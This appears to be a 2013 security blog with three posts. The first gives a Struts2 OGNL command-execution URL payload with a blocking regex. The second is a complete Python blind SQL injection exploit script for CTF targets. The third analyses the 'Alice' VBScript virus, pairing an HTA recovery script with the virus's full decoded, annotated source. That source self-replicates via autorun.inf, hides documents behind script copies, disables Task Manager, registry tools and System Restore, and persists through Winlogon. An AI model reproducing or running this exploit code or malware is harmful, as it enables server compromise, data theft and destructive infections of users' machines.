It allows an attacker to obtain system permissions and execute commands.
http://URL/PAGE.ACTION(or .DO)?redirect:$%7B%23a%3d(new%20java.lang.ProcessBuilder(%22whoami%22)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char%5B50000%5D,%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D
Solution:
- Upgrade the Struts2 version
- Block the pattern with a regex
(.*)(redirect|action)(.*)java(.|%2e)lang(.|%2e)ProcessBuilder(.*)com(.|%2e)opensymphony(.*)
Reference: http://www.exploit-db.com/exploits/25980/
Friday, 19 July 2013
Thursday, 4 July 2013
Bool-based Blind SQL Injection python.
I wrote a bool-based blind SQL injection script.
Sometimes I need blind SQL injection code for a CTF.
I will add more functions.
Reference: www.exploit-db.com/download_pdf/12967/
Sometimes I need blind SQL injection code for a CTF.
I will add more functions.
import sys
import re
import urllib
import urllib2
import inspect
#import base64
#import mimetypes
#import pprint
def set_globalvar():
    """Populate the module-level configuration read by every other function.

    Nothing is sent from here; set_send(), set_getbit() and get_sqlexploit()
    read these names as globals.  Edit the values below to point the script
    at a CTF target.
    """
    global type_attack
    global host
    global findout
    global n
    global query
    global sqli_start
    global sqli_end
    global url
    global parameter
    #query = "SELECT 1"
    # Query whose result is recovered one bit at a time.
    query = "SELECT GROUP_CONCAT(TABLE_NAME) FROM information_schema.columns"
    # NOTE(review): this global is never read; set_getvalue() has its own
    # parameter of the same name (default 8) that shadows it.
    n=8
    host="http://127.0.0.1"
    url="/sqli.php"
    # Name of the injected GET/POST/cookie/form field.
    parameter="a"
    # Marker text: its presence in the response means the probe was "true".
    findout="Sample"
    # Not declared global, so this stays local; it is only referenced by a
    # commented-out line in set_send().
    session=""
    type_attack="GET"
    #type_attack = "POST"
    #type_attack = "COOKIE"
    #type_attack = "MULTIPART"
    # Prefix/suffix wrapped around every probe (see set_send()).
    sqli_start="1 AND "
    sqli_end="--"
def set_error():
    """Print which function reported an error and return 0.

    inspect.stack()[1][3] is the name of the caller, so the message says
    where the problem was detected without the caller passing its name.
    """
    print("It is an error MSG from function: %s" % (inspect.stack()[1][3]))
    return 0
def printr(data):
    """Write each item of the iterable *data* to stdout as it arrives, then a footer.

    Flushing after every item makes the slow, one-character-per-batch
    extraction visible while it is still running.
    """
    for x in data:
        sys.stdout.write(x)
        sys.stdout.flush()
    print("")
    print("")
    print("[*] Exploit Complete!")
def set_send(params):
    """Send one boolean probe and return the raw response (headers + body) as text.

    *params* is a SQL expression evaluating to 0 or 1; it is wrapped as
    ``IF(1=1,<params>,0)`` and spliced between the global ``sqli_start`` and
    ``sqli_end``.  The global ``type_attack`` selects the carrier: GET query
    string, POST form body, a Cookie header, or a hand-built multipart form.
    The caller (set_getbit) only searches the returned text for ``findout``.

    Python 2 only (urllib2/urllib).  If ``type_attack`` matches none of the
    four branches, ``resp`` is never assigned and the final lines raise
    NameError.
    """
    params = "IF(1=1,%s,0)" % (params)
    finalquery=sqli_start+params+sqli_end
    # NOTE(review): urllib2.quote relies on urllib2 re-exporting urllib.quote
    # (the case on Python 2.7) - confirm on the interpreter in use.
    encoding_finalquery = urllib2.quote(finalquery)
    if(type_attack=="GET"):
        action = urllib2.build_opener()
        #action.addheaders.append(('Cookie', 'SESSION=%s' %(session)))
        #resp = urllib2.urlopen(host+url+"?"+parameter+"="+encoding_finalquery)
        resp = action.open(host+url+"?"+parameter+"="+encoding_finalquery)
    elif(type_attack=="POST"):
        # urlencode does the escaping here, so the unencoded query is used.
        values = {parameter : finalquery}
        cookie = urllib.urlencode(values)  # despite the name, this is the POST body
        resp = urllib2.urlopen(host+url, cookie)
    elif(type_attack=="COOKIE"):
        action = urllib2.build_opener()
        action.addheaders.append(('Cookie', '%s=%s' % (parameter, encoding_finalquery)))
        resp = action.open(host+url)
    elif(type_attack=="MULTIPART"):
        # Two-part form: the injected field, plus a dummy file part named
        # "pwd" (filename test.php, content "1234") with a fixed boundary.
        filename = "test.php"
        CRLF = '\r\n'
        boundary = '----WebKitFormBoundaryL4f8jRRQx76T6nV9'
        parts = []
        parts.append('--' + boundary)
        parts.append('Content-Disposition: form-data; name="%s"' % (parameter))
        parts.append('')
        parts.append(finalquery)
        parts.append('--' + boundary)
        parts.append('Content-Disposition: form-data; name="pwd"; filename="%s"' % (filename))
        parts.append('Content-Type: application/octet-stream')
        parts.append('')
        parts.append('1234')
        parts.append('--' + boundary + '--')
        parts.append('')
        body= CRLF.join(parts)
        headers = {'content-type' : 'multipart/form-data; boundary=%s' % (boundary)}
        req = urllib2.Request(host+url, body, headers)
        resp = urllib2.urlopen(req)
    # Header values (presumably one per header name when iterating the
    # message) joined by newlines, followed by the body; every body line is
    # repr()'d, so set_getbit searches the escaped text.
    data = "\n".join([resp.info().get(i) for i in resp.info()])
    data += "\n" + "".join([repr(x) for x in resp])
    return data
def set_getbit(data):
    """Return '1' if the marker ``findout`` occurs in *data*, else '0'.

    re.findall() treats ``findout`` as a regular expression.  With a plain
    word such as "Sample" every match text equals the pattern, so the
    ``in bit`` test succeeds; a pattern containing metacharacters or groups
    would not reproduce itself in the match list and would always give '0'.

    Raises:
        RuntimeError: in place of TypeError (e.g. *data* is None).  The
            IndexError branch is not reachable from the visible code but is
            mapped the same way; get_sqlexploit() turns RuntimeError into
            the "SQL error." message.
    """
    try:
        bit = re.findall(findout, data)
        if findout in bit: return '1'
        else: return '0'
    except IndexError: raise RuntimeError
    except TypeError: raise RuntimeError
def set_getvalue(val, n=8):
    """Recover the integer value of SQL expression *val* one bit at a time.

    Probes bits n-1 down to 0 with ``(val>>bit&1)``, concatenates the
    '1'/'0' answers most-significant first and converts from base 2.
    Costs one request per bit.  The parameter *n* shadows the global of the
    same name set in set_globalvar(); the global is never read here.
    """
    byte=""
    for bit in range(n-1, -1, -1):
        tmp = set_getbit(set_send("(%s>>%d&1)" % (val, bit)))
        byte += tmp
    return int(byte, 2)
def set_getlength(content):
    """Return LENGTH(*content*) recovered as a 32-bit value (32 requests)."""
    return set_getvalue("LENGTH(%s)" % content, 32)
def set_getstring(content):
    """Yield the characters of SQL expression *content* one at a time.

    First recovers the length, then asks for ``ASCII(MID(content,i,1))`` for
    i = 0 .. length (8 requests per character).  MID() positions are 1-based,
    so the i=0 iteration presumably yields chr(0) before the real text -
    confirm against the target database.  Python 2 code (xrange).
    """
    length = set_getlength(content)
    print(" [-] Lengh: %s" % length)
    print(" [-] Result")
    for i in xrange(length+1):
        yield chr(set_getvalue("ASCII(MID((%s),%d,1))" % (content, i)))
def get_sqlexploit(query):
    """Generator: yield the result of *query* character by character.

    Validates the global ``type_attack`` first; on an unknown value it prints
    a message, calls set_error() (return value discarded) and yields nothing.
    A RuntimeError raised by set_getbit() ends the stream with "SQL error.".
    """
    print(" [-] Method: %s" % (type_attack))
    # NOTE(review): `is` compares identity, not equality.  This appears to work
    # only because CPython interns these short literals, so the global and the
    # literal are the same object; `==` is the intended comparison.
    if not ((type_attack is "GET") or (type_attack is "POST") or (type_attack is "COOKIE") or (type_attack is "MULTIPART")):
        print("Please check type of the attack")
        set_error()
    else:
        '''
MySQL If Statement
IF(condition,true-part,false-part) (M)
SELECT IF(1=1,'true','false')
SQL Server If Statement
IF condition true-part ELSE false-part (S)
IF (1=1) SELECT 'true' ELSE SELECT 'false'
'''
        try:
            for i in set_getstring("(%s)" %(query)): yield i
        except RuntimeError:
            yield "SQL error."
            # Python 2 idiom: under PEP 479 (Python 3.7+) raising StopIteration
            # inside a generator is itself turned into a RuntimeError.
            raise StopIteration
def main():
    """Load the configuration, print the banner and stream the extracted result to stdout."""
    set_globalvar()
    print(" - A Bool-based SQL Injection Vulnerability Exploit")
    print("")
    print(" Author: Kerz")
    print(" Date: 05/07/2013")
    print("")
    # % binds tighter than +: the format is applied to host alone and url is
    # appended afterwards, which still prints "<host><url>".
    print("[*] Target: %s" % host+url)
    print("[+] Injection")
    printr(get_sqlexploit(query))
# Entry point: runs only when executed as a script, not when imported.
if __name__ == '__main__':
    main()
Reference: www.exploit-db.com/download_pdf/12967/
Tuesday, 2 July 2013
An Alice Virus analysis by script-kid.
Do not EXECUTE this code on your normal Windows laptop.
I got an Alice Virus from e-mail.
It is a virus which does the following:
It turns every doc, docx and rtf file into an 8 KB .vbe and hides the original doc files.
It turns .htm and .html files into .hta files containing the Alice Virus VBScript.
It is encoded with the Microsoft Script Encoder; however, it can be decoded using scrdec18.
It deletes .lnk files
It changes and removes Windows registry values.
It infects autorun.inf
It creates Alice.sys and Alice.alc, located in c:\Windows\System32\Drivers\ (32-bit).
MS Essentials can detect the virus; on the other hand, it cannot recover the html files.
First of all, I tried to make a program for recovering the html files:
I coded a function that counts occurrences of the "alice.tmp" string in the .HTA files until there is no "alice.tmp" left.
I did not have files include "alice.tmp" strings when I try to fix infected files.
I removed (5 * (alice.tmp count / 2)) lines from the end of the hta files.
I changed file extension from .hta to .html.
Second, I installed MS Essentials and removed the Alice Virus.
Last, I restored normal attributes on the doc, docx and rtf files (unhidden, not read-only).
I restored the registry values.
This is the logic of the hta2html source code.
import os
import re
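def os_walkf(root, filterDir=None, filterName=None, filterExt=None):
    """Walk *root* recursively and yield the full path of every file passing the filters.

    Args:
        root: directory to start from (handed to os.walk).
        filterDir: optional predicate on a directory *name*; directories it
            rejects are pruned in place so os.walk never descends into them.
        filterName: optional predicate on the file name (with extension).
        filterExt: optional predicate on the extension as returned by
            os.path.splitext, e.g. ".hta" (in whatever case the disk reports).

    Yields:
        os.path.join(base, name) for each accepted file, in os.walk order.

    A filter that is None (or otherwise falsy) accepts everything.  When both
    file filters are given, filterName is evaluated first and filterExt is
    only called if filterName passed, as in the original four-branch version
    this collapses.
    """
    for base, subdirs, names in os.walk(root):
        if filterDir:
            # Slice assignment mutates the list os.walk is iterating, which is
            # the documented way to prune the traversal.
            subdirs[:] = [d for d in subdirs if filterDir(d)]
        for name in names:
            if filterName and not filterName(name):
                continue
            if filterExt and not filterExt(os.path.splitext(name)[1]):
                continue
            yield os.path.join(base, name)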
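def set_countstring(path):
    """Return how many times the file at *path* was infected.

    Each injected Alice block mentions "alice.tmp" twice (once when it writes
    the temp file and once when it runs it), so the occurrence count is
    halved.  Floor division keeps the Python 2 integer result on Python 3,
    where ``/`` would yield a float and break the line arithmetic in
    set_hta2html().  The file is closed even if reading fails.

    Args:
        path: path of a (possibly infected) .hta file, read as text.

    Returns:
        Occurrences of "alice.tmp" divided by two, rounded down.
    """
    with open(path, "r") as fs:
        data = fs.read()
    return data.count("alice.tmp") // 2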
def set_filelen(fs):
    """Count readline() calls on *fs* up to and including the one that hits EOF.

    The terminating empty read is counted too, so the result is one more
    than the number of lines in the stream (1 for an empty stream).
    NOTE(review): set_hta2html's ``fs_len - (6*strcnt)`` arithmetic was
    written against this off-by-one value; keep the two in step if either
    is changed.

    Args:
        fs: an open text stream positioned where counting should start.

    Returns:
        Number of lines read plus one.
    """
    total = 1
    while fs.readline():
        total += 1
    return total
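def set_hta2html(path):
    """Strip the Alice payload from an infected .hta and write a .html copy.

    The infection appends one ``<HTML><SCRIPT>...</SCRIPT></HTML>`` block of
    five lines per pass, preceded by a line break, and every block names
    ``alice.tmp`` twice.  So the number of trailing lines to drop is
    ``5 * (occurrences // 2)``; the original ``fs_len - (6*strcnt)`` only
    matched for a single infection because set_filelen() over-counts by one.
    The surviving lines are copied byte-for-byte (binary mode keeps CRLF
    intact) to ``<path without .hta>.html``; the source file is left in place
    for the caller to remove.  If the original file ended with a line break,
    one empty line may remain at the end of the output.

    Args:
        path: filesystem path of an infected (or clean) .hta file.

    Returns:
        The path of the .html file written.
    """
    with open(path, "rb") as src:
        data = src.read()
    infections = data.count(b"alice.tmp") // 2
    lines = data.splitlines(True)
    # Never drop more than the file holds, whatever the count says.
    keep = max(len(lines) - 5 * infections, 0)
    new_filename = os.path.splitext(path)[0] + ".html"
    with open(new_filename, "wb") as dst:
        dst.writelines(lines[:keep])
    return new_filename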
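def main():
    """Convert every infected .hta on every mounted volume back to .html.

    Volume roots are parsed from ``mountvol /`` output, so this is Windows
    only.  Each converted .hta is deleted after set_hta2html() has written
    the .html copy, so run it against a backup first.  The original passed
    ``filterDir=lambda dir: dir`` to os_walkf, which accepts every non-empty
    directory name and was dropped as a no-op.
    """
    drives = re.findall(r"[A-Z]+:.*$", os.popen("mountvol /").read(), re.MULTILINE)
    for root in drives:
        # Case-insensitive match: the virus writes ".hta" but the filesystem
        # may report the extension in any case.
        for path in os_walkf(root, filterExt=lambda ext: ext.lower() == ".hta"):
            print(path)
            set_hta2html(path)
            os.remove(path)


if __name__ == "__main__":
    main()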
This is the Alice Virus code after decoding it with scrdec18.
#Alice virus
option explicit
' Objects shared by every routine below:
'   f300e - Scripting.FileSystemObject (all file and drive work)
'   thpfp - WScript.Shell (registry reads/writes and process launches)
'   mxlcm - File object for the running script itself (its source is copied around)
'   ye9ue - GetSpecialFolder(0), the Windows folder
'   aixlb - GetSpecialFolder(1), the System folder; alice.sys is dropped in its drivers\ subfolder
dim f300e,thpfp,mxlcm,ye9ue,aixlb
set f300e=createobject("Scripting.FileSystemObject")
set thpfp=createobject("WScript.Shell")
set mxlcm=f300e.getfile(wscript.scriptfullname)
set ye9ue=f300e.getspecialfolder(0)
set aixlb=f300e.getspecialfolder(1)
' Drop a copy of this script at ck1cp (via v41tf) and mark it
' ReadOnly+Hidden+System+Archive (1+2+4+32 = 39) so it stays out of sight.
sub ayfp6(ck1cp)
    on error resume next
    dim s41k8
    v41tf(ck1cp)
    set s41k8=f300e.getfile(ck1cp)
    s41k8.attributes=39
end sub
' One infection pass over every removable (1), fixed (2) and network (3)
' drive except A:: plant alice.alc and an autorun.inf at the root, then
' infect the root folder and recurse into its subfolders.
sub f0l51()
    on error resume next
    dim bgw3u
    for each bgw3u in f300e.drives
        if (bgw3u.drivetype=1 or bgw3u.drivetype=2 or bgw3u.drivetype=3) and bgw3u.path<>"A:" then
            ayfp6(bgw3u.path&"\alice.alc")
            qag1n(bgw3u.path&"\autorun.inf")
            syasj(bgw3u.path&"\")
            rid6b(bgw3u.path&"\")
        end if
    next
end sub
' Delete every .lnk shortcut in the user's Recent folder.
sub hy26l()
    on error resume next
    dim e9ljz,purpl
    for each e9ljz in f300e.getfolder(thpfp.specialfolders("Recent")).files
        purpl=lcase(f300e.getextensionname(e9ljz.path))
        if purpl="lnk" then
            zpzoe(e9ljz.path)
        end if
    next
end sub
' Turn the HTML file p9krq into the HTA file wzc5e.  The original markup is
' written first, then a second <HTML><SCRIPT language="VBScript"> block is
' appended whose script writes this file's own source to <Temp>\alice.tmp
' and runs it with "wscript.exe //e:vbscript.encode".  Every " in the
' embedded source is swapped for chr(216) so it survives inside a string
' literal, and swapped back by the dropper.  The appended block is one line
' break followed by five lines and names alice.tmp twice - that is what the
' hta2html recovery script counts and strips.
sub kugxq(p9krq,wzc5e)
    on error resume next
    dim qs247,zf3cw,a4zpt,u960a,kbkzd
    set qs247=f300e.opentextfile(p9krq,1)
    zf3cw=qs247.readall
    qs247.close
    set qs247=f300e.opentextfile(mxlcm,1)
    a4zpt=qs247.readall
    qs247.close
    u960a=replace(a4zpt,chr(34),chr(216))
    kbkzd=vbcrlf&"<HTML>"&vbcrlf&"<SCRIPT language="&chr(34)&"VBScript"&chr(34)&">"&vbcrlf&"on error resume next:set i129a=createobject("&chr(34)&"Scripting.FileSystemObject"&chr(34)&"):set uvqkz=createobject("&chr(34)&"WScript.Shell"&chr(34)&"):set ony43=i129a.getspecialfolder(1):set rowb1=i129a.getspecialfolder(2):p3vli="&chr(34)&u960a&chr(34)&":l3h0l=replace(p3vli,chr(216),chr(34)):esbvk=l3h0l&chr(0):set ivofa=i129a.createtextfile(rowb1&"&chr(34)&"\alice.tmp"&chr(34)&",true):ivofa.write(esbvk):ivofa.close:uvqkz.run(ony43&"&chr(34)&"\wscript.exe //e:vbscript.encode "&chr(34)&"&rowb1&"&chr(34)&"\alice.tmp"&chr(34)&")"&vbcrlf&"</SCRIPT>"&vbcrlf&"</HTML>"
    set qs247=f300e.createtextfile(wzc5e,true)
    qs247.write(zf3cw)
    qs247.write(kbkzd)
    qs247.close
end sub
' Return the ProgID registered for extension db04w (default value of HKCR\.<ext>\).
function ljwom(db04w)
    ljwom=thpfp.regread("HKCR\."&db04w&"\")
end function
' While this script is the persistent copy (<System>\drivers\alice.sys),
' repeat the infection pass forever.  mxlcm is a File object, so the
' comparison presumably uses its default (Path) property.
sub llgz8()
    on error resume next
    do while mxlcm=(aixlb&"\drivers\alice.sys")
        f0l51()
    loop
end sub
' Install or run.  First launch: drop <System>\drivers\alice.sys and start
' it via wscript.exe.  When alice.sys already exists (i.e. this is the
' persistent copy): lock the registry down (vs7xo), disguise .vbe files as
' documents (wcpw7), wipe Recent shortcuts (hy26l) and loop over the drives
' (llgz8).
sub m9g2p()
    on error resume next
    if not f300e.fileexists(aixlb&"\drivers\alice.sys") then
        ayfp6(aixlb&"\drivers\alice.sys")
        thpfp.run(aixlb&"\wscript.exe //e:vbscript.encode "&aixlb&"\drivers\alice.sys")
    else
        vs7xo()
        wcpw7()
        hy26l()
        llgz8()
    end if
end sub
' Write an autorun.inf at fg77p whose shellexecute, open and explore entries
' all launch alice.alc through wscript.exe.  If the first write fails
' (e.g. an existing protected file) delete it and retry, then mark the file
' ReadOnly+Hidden+System+Archive (39).
sub qag1n(fg77p)
    on error resume next
    dim btfzw,tmkuj
    btfzw="[autorun]"&vbcrlf&"shellexecute=wscript.exe //e:vbscript.encode alice.alc"&vbcrlf&"shell\open\command=wscript.exe //e:vbscript.encode alice.alc"&vbcrlf&"shell\explore\command=wscript.exe //e:vbscript.encode alice.alc"
    set tmkuj=f300e.createtextfile(fg77p,true)
    tmkuj.write(btfzw)
    tmkuj.close
    if err.number<>0 then
        zpzoe(fg77p)
        set tmkuj=f300e.createtextfile(fg77p,true)
        tmkuj.write(btfzw)
        tmkuj.close
    end if
    set tmkuj=f300e.getfile(fg77p)
    tmkuj.attributes=39
end sub
' Recurse into every subfolder of wib5969 except RECYCLER and
' "System Volume Information", infecting each one (syasj).
sub rid6b(wib5969)
    on error resume next
    dim zdet3
    for each zdet3 in f300e.getfolder(wib5969).subfolders
        if zdet3.name<>"RECYCLER" and zdet3.name<>"System Volume Information" then
            syasj(zdet3.path)
            rid6b(zdet3.path)
        end if
    next
end sub
' Infect one folder qo1qy.  For each doc/docx/rtf (skipping Word's "~$"
' lock files) drop a copy of this script as <basename>.vbe beside it and
' hide the real document (vd8vs, attributes 38).  For each htm/html build
' <basename>.hta with the payload appended (kugxq) and delete the original.
sub syasj(qo1qy)
    on error resume next
    dim vlx8c,tk8hq,eiklf,fbr9k
    for each vlx8c in f300e.getfolder(qo1qy).files
        tk8hq=lcase(f300e.getextensionname(vlx8c.path))
        eiklf=f300e.getbasename(vlx8c.path)
        if (tk8hq="doc" or tk8hq="docx" or tk8hq="rtf") and left(eiklf,2)<>"~$" then
            v41tf(qo1qy&"\"&eiklf&".vbe")
            vd8vs(vlx8c.path)
        elseif tk8hq="htm" or tk8hq="html" then
            ' Unusual call syntax: both arguments are individually parenthesised.
            kugxq(vlx8c.path),(qo1qy&"\"&eiklf&".hta")
            zpzoe(vlx8c.path)
        end if
    next
end sub
' Write this script's own source to watpl; if the first write fails, delete
' whatever is in the way (zpzoe) and try once more.
sub v41tf(watpl)
    on error resume next
    dim ugn6h,jk5vz
    set ugn6h=f300e.opentextfile(mxlcm,1)
    jk5vz=ugn6h.readall
    ugn6h.close
    set ugn6h=f300e.createtextfile(watpl,true)
    ugn6h.write(jk5vz)
    ugn6h.close
    if err.number<>0 then
        zpzoe(watpl)
        set ugn6h=f300e.createtextfile(watpl,true)
        ugn6h.write(jk5vz)
        ugn6h.close
    end if
end sub
' Mark the file p3zu2 Hidden+System+Archive (2+4+32 = 38) so the real
' document disappears from a default Explorer view.
sub vd8vs(p3zu2)
    on error resume next
    dim p3fbg
    set p3fbg=f300e.getfile(p3zu2)
    p3fbg.attributes=38
end sub
' Lock the machine down through the registry and install persistence.
' Every key touched here is an indicator worth checking during cleanup.
sub vs7xo()
    on error resume next
    ' Remove shell verbs a user could use to inspect or repair: "Open With",
    ' installing .inf files, merging .reg files, and the Open2/Edit verbs of
    ' .vbe files (so the dropped copies cannot be opened in an editor).
    thpfp.regdelete"HKCR\*\shellex\ContextMenuHandlers\Open With\"
    thpfp.regdelete"HKCR\inffile\shell\Install\command\"
    thpfp.regdelete"HKCR\inffile\shell\Install\"
    thpfp.regdelete"HKCR\regfile\shell\open\command\"
    thpfp.regdelete"HKCR\regfile\shell\open\"
    thpfp.regdelete"HKCR\VBEFile\Shell\Open2\command\"
    thpfp.regdelete"HKCR\VBEFile\Shell\Open2\"
    thpfp.regdelete"HKCR\VBEFile\Shell\Edit\command\"
    thpfp.regdelete"HKCR\VBEFile\Shell\Edit\"
    ' Explorer/system policies for the current user: Hidden=0 (presumably
    ' meant to keep hidden files invisible), hide extensions so .vbe copies
    ' look like documents, and disable file-association changes, Search,
    ' Folder Options, Run, Registry Editor, Task Manager and the command
    ' prompt (DisableCMD).
    thpfp.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden","0","REG_DWORD"
    thpfp.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt","1","REG_DWORD"
    thpfp.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileAssociate","1","REG_DWORD"
    thpfp.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind","1","REG_DWORD"
    thpfp.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","1","REG_DWORD"
    thpfp.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun","1","REG_DWORD"
    thpfp.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","1","REG_DWORD"
    thpfp.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","1","REG_DWORD"
    thpfp.regwrite"HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD","2","REG_DWORD"
    ' Vandalism: rewrite the registered owner/organisation strings.
    thpfp.regwrite"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner","ALICE"
    thpfp.regwrite"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization",""
    ' Persistence: Winlogon\Userinit keeps the real userinit.exe and adds
    ' wscript.exe running <System>\drivers\alice.sys at every logon.
    thpfp.regwrite"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",aixlb&"\userinit.exe,"&aixlb&"\wscript.exe //e:vbscript.encode "&aixlb&"\drivers\alice.sys"
    ' Disable System Restore so the changes cannot be rolled back.
    thpfp.regwrite"HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableSR","1","REG_DWORD"
    thpfp.regwrite"HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore\DisableConfig","1","REG_DWORD"
end sub
' Disguise: copy the Word document ProgID's description, DefaultIcon and
' FriendlyTypeName onto the VBE ProgID and set NeverShowExt, so the dropped
' .vbe files show the Word icon and type name with no extension.
sub wcpw7()
    on error resume next
    dim r0a7u,rwyg5
    r0a7u="HKCR\"&ljwom("doc")
    rwyg5="HKCR\"&ljwom("VBE")
    thpfp.regwrite rwyg5&"\",thpfp.regread(r0a7u&"\")
    thpfp.regwrite rwyg5&"\DefaultIcon\",thpfp.regread(r0a7u&"\DefaultIcon\")
    thpfp.regwrite rwyg5&"\FriendlyTypeName",thpfp.regread(r0a7u&"\"),"REG_EXPAND_SZ"
    thpfp.regwrite rwyg5&"\NeverShowExt",""
end sub
' Decoy on launch.  When running as alice.alc, open Explorer at the script.
' Otherwise ktl17 is the script path minus its 3-letter extension; if a
' .doc/.docx/.rtf with that base name exists (the hidden original next to
' the fake .vbe) open it with its registered handler, so the victim sees
' the document they double-clicked.
sub xvhxt()
    on error resume next
    dim ktl17
    ktl17=left(mxlcm,len(mxlcm)-3)
    if mxlcm.name="alice.alc" then
        thpfp.run ye9ue&"\explorer.exe /e,/select,"&wscript.scriptfullname
    elseif f300e.fileexists(ktl17&"doc") then
        thpfp.run(thpfp.regread("HKCR\"&ljwom("doc")&"\shell\Open\command\")&chr(32)&chr(34)&ktl17&"doc"&chr(34))
    elseif f300e.fileexists(ktl17&"docx") then
        thpfp.run(thpfp.regread("HKCR\"&ljwom("docx")&"\shell\Open\command\")&chr(32)&chr(34)&ktl17&"docx"&chr(34))
    elseif f300e.fileexists(ktl17&"rtf") then
        thpfp.run(thpfp.regread("HKCR\"&ljwom("rtf")&"\shell\Open\command\")&chr(32)&chr(34)&ktl17&"rtf"&chr(34))
    end if
end sub
' Delete the file yunj7; if that fails (e.g. read-only/system attributes),
' clear its attributes and try again.
sub zpzoe(yunj7)
    on error resume next
    dim fbr9k
    f300e.deletefile(yunj7)
    if err.number<>0 then
        set fbr9k=f300e.getfile(yunj7)
        fbr9k.attributes=0
        f300e.deletefile(yunj7)
    end if
end sub
' Entry point: show the decoy first, then install or propagate.
xvhxt()
m9g2p()